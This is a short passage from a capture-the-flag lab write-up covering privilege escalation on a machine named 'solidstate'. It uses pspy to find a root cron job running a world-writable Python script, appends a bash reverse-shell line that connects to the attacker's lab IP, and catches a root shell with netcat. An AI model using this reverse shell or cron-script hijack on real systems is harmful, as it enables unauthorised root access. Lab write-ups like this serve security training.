7 privesc

Nothing showed up on PEAS
Running pspy32

2021/07/01 21:38:29 CMD: UID=0    PID=498    | /bin/sh /opt/james-2.3.2/bin/run.sh
2021/07/01 21:40:47 CMD: UID=0    PID=1      | /sbin/init
2021/07/01 21:42:01 CMD: UID=0    PID=3592   | /usr/sbin/CRON -f
2021/07/01 21:42:01 CMD: UID=0    PID=3594   | python /opt/tmp.py
2021/07/01 21:42:01 CMD: UID=0    PID=3593   | /bin/sh -c python /opt/tmp.py
2021/07/01 21:42:01 CMD: UID=0    PID=3595   | sh -c rm -r /tmp/*


${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -la
total 16
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 Apr 26 12:37 ..
drwxr-xr-x 11 root root 4096 Apr 26 12:37 james-2.3.2
-rwxrwxrwx  1 root root  227 Jul  1 21:53 tmp.py

Adding line to tmp.py
os.system("bash -c 'bash -i >& /dev/tcp/10.10.16.161/8080 0>&1'")

$ rlwrap nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.51] 45470
bash: cannot set terminal process group (3627): Inappropriate ioctl for device
bash: no job control in this shell
root@solidstate:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Last updated